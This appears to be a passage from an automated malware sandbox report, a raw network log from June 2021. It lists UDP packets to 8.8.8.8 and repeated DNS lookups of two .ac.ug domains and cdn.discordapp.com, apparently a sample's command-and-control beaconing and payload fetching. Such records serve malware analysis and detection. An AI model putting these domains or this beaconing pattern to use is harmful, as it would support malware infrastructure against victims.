                                          Jun 4, 2021 09:40:14.205878973 CEST6172153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:14.247083902 CEST53617218.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:15.134371996 CEST5125553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:15.177704096 CEST53512558.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:16.026128054 CEST6152253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:16.069525003 CEST5233753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:16.111032963 CEST53523378.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:16.129209995 CEST53615228.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:17.293454885 CEST5504653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:17.515693903 CEST53550468.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:18.532757044 CEST4961253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:18.656070948 CEST53496128.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:19.782900095 CEST4928553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:19.829819918 CEST5060153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:19.848630905 CEST53492858.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:19.881160975 CEST53506018.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:20.890875101 CEST6087553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:20.940700054 CEST53608758.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:22.111352921 CEST5644853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:22.180686951 CEST53564488.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:23.189179897 CEST5917253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:23.238006115 CEST53591728.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:24.409887075 CEST6242053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:24.458822012 CEST53624208.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:25.471311092 CEST6057953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:25.520107031 CEST53605798.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:26.689762115 CEST5018353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:26.738759995 CEST53501838.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:27.849464893 CEST6153153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:27.899045944 CEST53615318.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:29.418231964 CEST4922853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:29.469103098 CEST53492288.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:29.655761957 CEST5979453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:29.707072973 CEST53597948.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:30.482249975 CEST5591653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:30.605134964 CEST53559168.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:31.892159939 CEST5275253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:32.028281927 CEST53527528.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:33.035231113 CEST6054253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:33.085849047 CEST53605428.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:34.236119986 CEST6068953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:34.285319090 CEST53606898.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:35.292241096 CEST6420653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:35.394838095 CEST53642068.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:36.549367905 CEST5090453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:36.664606094 CEST53509048.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:37.678133011 CEST5752553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:38.007536888 CEST5381453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:38.057444096 CEST53538148.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:38.686717033 CEST5752553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:38.735856056 CEST53575258.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:38.959199905 CEST53575258.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:39.890947104 CEST5341853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:39.940066099 CEST53534188.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:40.951872110 CEST6283353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:41.000473976 CEST53628338.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:42.213363886 CEST5926053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:42.285602093 CEST53592608.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:42.890507936 CEST4994453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:42.941764116 CEST53499448.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:43.004446030 CEST6330053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:43.056083918 CEST53633008.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:43.303922892 CEST6144953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:43.352905035 CEST53614498.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:43.625176907 CEST5127553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:43.673769951 CEST53512758.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:44.096595049 CEST6349253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:44.163150072 CEST53634928.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:44.493014097 CEST5894553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:44.544090033 CEST53589458.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:44.619203091 CEST6077953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:44.667825937 CEST53607798.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:45.050326109 CEST6401453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:45.099097013 CEST53640148.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:45.677834988 CEST5709153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:45.728987932 CEST53570918.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:45.813648939 CEST5590453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:45.855035067 CEST53559048.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:47.621577024 CEST5210953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:47.670643091 CEST53521098.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:47.980453014 CEST5445053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:48.028963089 CEST53544508.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:48.652345896 CEST4937453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:48.701225996 CEST53493748.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:48.971319914 CEST5043653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:49.019717932 CEST53504368.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:49.869676113 CEST6260553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:49.920325994 CEST53626058.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:50.174776077 CEST5425653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:50.223773003 CEST53542568.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:51.041712046 CEST5218953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:51.092365026 CEST53521898.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:51.236432076 CEST5613153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:51.287056923 CEST53561318.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:51.587747097 CEST6299253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:51.637762070 CEST53629928.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:52.444996119 CEST5443253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:52.494193077 CEST53544328.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:53.502222061 CEST5722753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:53.551012993 CEST53572278.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:54.703207016 CEST5838353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:54.753180981 CEST53583838.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:55.762176037 CEST6313653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:55.813472033 CEST53631368.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:57.114552975 CEST5091153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:57.156025887 CEST53509118.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:58.169900894 CEST6340953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:58.218678951 CEST53634098.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:59.510843992 CEST5918553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:59.560050964 CEST53591858.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:00.566936016 CEST6423653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:00.669122934 CEST53642368.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:01.106141090 CEST5615753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:01.155877113 CEST53561578.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:01.952771902 CEST5560153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:02.001405954 CEST53556018.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:03.012248039 CEST5298453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:03.061315060 CEST53529848.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:04.241699934 CEST5114153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:04.290596962 CEST53511418.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:05.381131887 CEST5361053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:05.429944038 CEST53536108.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:06.781021118 CEST6124753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:06.830806971 CEST53612478.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:07.852442980 CEST6516553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:07.903352022 CEST53651658.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:09.087080956 CEST5207653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:09.129702091 CEST53520768.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:10.148986101 CEST5490353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:10.197743893 CEST53549038.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:11.368159056 CEST5504553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:11.409699917 CEST53550458.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:12.430563927 CEST5446453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:12.471990108 CEST53544648.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:13.652421951 CEST5097053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:13.701833963 CEST53509708.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:14.711209059 CEST5526153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:14.761611938 CEST53552618.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:15.930104017 CEST5980953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:15.979192019 CEST53598098.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:17.113964081 CEST5127853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:17.167419910 CEST53512788.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:18.341006994 CEST5193253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:18.453221083 CEST53519328.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:19.466461897 CEST5949453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:19.515099049 CEST53594948.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:20.680043936 CEST5591553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:20.731895924 CEST53559158.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:21.743691921 CEST4977953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:21.794507027 CEST53497798.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:22.963929892 CEST4945853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:23.012999058 CEST53494588.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:24.024235964 CEST5716453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:24.065589905 CEST53571648.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:25.228212118 CEST4984053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:25.277705908 CEST53498408.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:26.291290998 CEST5717453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:26.342190981 CEST53571748.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:27.510420084 CEST5853153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:27.559171915 CEST53585318.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:28.571286917 CEST4960853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:28.619645119 CEST53496088.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:29.422276974 CEST5568253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:29.488337040 CEST53556828.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:29.790783882 CEST6243653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:29.840023994 CEST53624368.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:30.827208042 CEST6123053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:30.856579065 CEST6473053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:30.875799894 CEST53612308.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:30.906867027 CEST53647308.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:32.107619047 CEST6062453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:32.156562090 CEST53606248.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:33.167161942 CEST6260053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:33.215828896 CEST53626008.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:34.388963938 CEST5320053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:34.438519001 CEST53532008.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:35.449734926 CEST6103453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:35.498428106 CEST53610348.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:36.683897972 CEST5768753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:36.733165979 CEST53576878.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:37.807146072 CEST4983953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:37.855993032 CEST53498398.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:39.149837017 CEST5797553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:39.199364901 CEST53579758.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:40.482820988 CEST5761053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:40.531407118 CEST53576108.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:41.715715885 CEST5513753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:41.765302896 CEST53551378.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:42.777014971 CEST5921653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:42.827914000 CEST53592168.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:43.996402025 CEST6349553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:44.045500994 CEST53634958.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:45.058801889 CEST6437153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:45.107799053 CEST53643718.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:46.277839899 CEST5403753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:46.326437950 CEST53540378.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:47.362359047 CEST5348153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:47.411079884 CEST53534818.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:48.591324091 CEST5831353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:48.640156031 CEST53583138.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:49.652962923 CEST5895053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:49.694082975 CEST53589508.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:50.874732971 CEST5501153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:50.925890923 CEST53550118.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:51.934591055 CEST5719853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:51.975991011 CEST53571988.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:53.155333042 CEST6087553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:53.196373940 CEST53608758.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:54.217448950 CEST5513453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:54.265856028 CEST53551348.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:55.435005903 CEST5369553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:55.483614922 CEST53536958.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:56.497416019 CEST5097553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:56.548612118 CEST53509758.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:57.716850996 CEST6546053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:57.765820980 CEST53654608.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:58.778393984 CEST6366953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:58.829729080 CEST53636698.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:59.995588064 CEST5165353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:42:00.037149906 CEST53516538.8.8.8192.168.2.4
                                          Jun 4, 2021 09:42:01.040570021 CEST5647353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:42:01.081743956 CEST53564738.8.8.8192.168.2.4
                                          Jun 4, 2021 09:42:02.247749090 CEST6145453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:42:02.300141096 CEST53614548.8.8.8192.168.2.4
                                          Jun 4, 2021 09:42:03.308010101 CEST5432353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:42:03.358968019 CEST53543238.8.8.8192.168.2.4
                                          Jun 4, 2021 09:42:04.529351950 CEST5996053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:42:04.572482109 CEST53599608.8.8.8192.168.2.4

                                          ICMP Packets

                                          TimestampSource IPDest IPChecksumCodeType
                                          Jun 4, 2021 09:40:38.959440947 CEST192.168.2.48.8.8.8d005(Port unreachable)Destination Unreachable

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Jun 4, 2021 09:39:57.147141933 CEST192.168.2.48.8.8.80xf48bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:16.026128054 CEST192.168.2.48.8.8.80x559fStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:17.293454885 CEST192.168.2.48.8.8.80x89d1Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:18.532757044 CEST192.168.2.48.8.8.80xb28fStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:19.829819918 CEST192.168.2.48.8.8.80xd1a1Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:20.890875101 CEST192.168.2.48.8.8.80x3c4Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:22.111352921 CEST192.168.2.48.8.8.80x54e8Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:23.189179897 CEST192.168.2.48.8.8.80xd2eStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:24.409887075 CEST192.168.2.48.8.8.80x9c86Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:25.471311092 CEST192.168.2.48.8.8.80x9f28Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:26.689762115 CEST192.168.2.48.8.8.80x2b4aStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:27.849464893 CEST192.168.2.48.8.8.80xa26bStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.418231964 CEST192.168.2.48.8.8.80xa7d5Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.655761957 CEST192.168.2.48.8.8.80x4d3dStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:30.482249975 CEST192.168.2.48.8.8.80x1860Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:31.892159939 CEST192.168.2.48.8.8.80xf6ccStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:33.035231113 CEST192.168.2.48.8.8.80xfa74Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:34.236119986 CEST192.168.2.48.8.8.80x59f6Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:35.292241096 CEST192.168.2.48.8.8.80xa0a0Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:36.549367905 CEST192.168.2.48.8.8.80xef6fStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:37.678133011 CEST192.168.2.48.8.8.80xbefaStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.007536888 CEST192.168.2.48.8.8.80xa9eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.686717033 CEST192.168.2.48.8.8.80xbefaStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:39.890947104 CEST192.168.2.48.8.8.80xaeeStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:40.951872110 CEST192.168.2.48.8.8.80xd728Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:42.213363886 CEST192.168.2.48.8.8.80xdc3dStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:43.303922892 CEST192.168.2.48.8.8.80xb7a7Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:44.619203091 CEST192.168.2.48.8.8.80xe6a4Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:45.677834988 CEST192.168.2.48.8.8.80x9e3dStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:47.621577024 CEST192.168.2.48.8.8.80x7e16Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:48.971319914 CEST192.168.2.48.8.8.80x4089Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:50.174776077 CEST192.168.2.48.8.8.80x4bbdStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:51.236432076 CEST192.168.2.48.8.8.80xc9fcStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:52.444996119 CEST192.168.2.48.8.8.80xf5bStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:53.502222061 CEST192.168.2.48.8.8.80xf78eStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:54.703207016 CEST192.168.2.48.8.8.80xd592Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:55.762176037 CEST192.168.2.48.8.8.80xdb85Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:57.114552975 CEST192.168.2.48.8.8.80x13c7Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:58.169900894 CEST192.168.2.48.8.8.80x4c29Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:59.510843992 CEST192.168.2.48.8.8.80x936cStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:00.566936016 CEST192.168.2.48.8.8.80x45ceStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:01.952771902 CEST192.168.2.48.8.8.80x4f6dStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:03.012248039 CEST192.168.2.48.8.8.80x135aStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:04.241699934 CEST192.168.2.48.8.8.80xc8d0Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:05.381131887 CEST192.168.2.48.8.8.80xf803Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:06.781021118 CEST192.168.2.48.8.8.80xbf57Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:07.852442980 CEST192.168.2.48.8.8.80xbfdeStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:09.087080956 CEST192.168.2.48.8.8.80x1fe4Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:10.148986101 CEST192.168.2.48.8.8.80xfe4aStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:11.368159056 CEST192.168.2.48.8.8.80x20b0Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:12.430563927 CEST192.168.2.48.8.8.80xa7b0Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:13.652421951 CEST192.168.2.48.8.8.80x8da9Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:14.711209059 CEST192.168.2.48.8.8.80xcb28Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:15.930104017 CEST192.168.2.48.8.8.80x84aStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:17.113964081 CEST192.168.2.48.8.8.80x6cccStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:18.341006994 CEST192.168.2.48.8.8.80x5dc6Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:19.466461897 CEST192.168.2.48.8.8.80xf0dfStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:20.680043936 CEST192.168.2.48.8.8.80x37f3Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:21.743691921 CEST192.168.2.48.8.8.80x1ba3Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:22.963929892 CEST192.168.2.48.8.8.80x5b84Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:24.024235964 CEST192.168.2.48.8.8.80xfa28Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:25.228212118 CEST192.168.2.48.8.8.80x11deStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:26.291290998 CEST192.168.2.48.8.8.80xc8dfStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:27.510420084 CEST192.168.2.48.8.8.80xc7dcStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:28.571286917 CEST192.168.2.48.8.8.80x1bb7Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
